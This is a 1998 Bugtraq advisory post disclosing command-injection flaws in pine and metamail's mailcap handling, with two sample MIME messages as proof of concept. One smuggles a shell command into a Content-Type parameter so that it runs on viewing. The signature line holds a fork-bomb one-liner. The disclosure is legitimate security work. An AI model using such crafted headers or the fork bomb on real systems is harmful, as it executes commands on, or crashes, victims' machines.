Bugtraq mailing list archives

mailrc and pine security holes

From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Sun, 5 Apr 1998 15:25:25 +0200


Many of mailcap-compatible unix mail clients have several security holes.
Mailcap mechanism is usually so poorly implemented that it's possible
to perform wida range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):


========================================
Example 1 (light) - pine 3.96 confusion
=======================================

Following example demostrates how to cause a few 'mostly harmless'
errors due to the improper expansion of ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
        charset="crashme`"
Content-Transfer-Encoding: quoted-printable

Hellow!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ***


===============================================
Example 2 (heavy) - execution of arbitrary code
===============================================

That's something even more dangerous - following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script):

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
        encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
Content-Transfer-Encoding: quoted-printable

Hellow!!!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****

_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

Current thread:

Communicator exploits, (continued)
- - - Communicator exploits Fernand Portela (Apr 10)
    - Sun rpcbind Nicolas Dubee (Apr 10)
    - Re: Sun rpcbind Aaron Bornstein (Apr 10)
  - QW vulnerability Glenn F. Maynard (Apr 07)
  - AppleShare IP Mail Server Chris Wedgwood (Apr 07)
    - Re: AppleShare IP Mail Server David Luyer (Apr 07)
    - Re: AppleShare IP Mail Server James W. Abendschan (Apr 07)
- Geac ADVANCE library system security HOLE GAVRILIS DIMITR (Apr 02)
  - Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
  - Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
  - mailrc and pine security holes Michal Zalewski (Apr 05)
  - ICQ Spoofer Seth McGann (Apr 05)
- Re: BSD coredumps follow symlinks Nir Soffer (Apr 02)
- Security hole in TMS/SMS standby (Apr 03)
- BSD coredumps follow symlinks Ronny Cook (Apr 02)
- Re: BSD coredumps follow symlinks Ronny Cook (Apr 05)
  - QuakeI server serious hole (yawn) Chris Evans (Apr 06)
  - The ICQ exploitation Center - www.wpi.edu/~smm/icq Seth McGann (Apr 06)
  - Re: BSD coredumps follow symlinks Ariel Biener (Apr 06)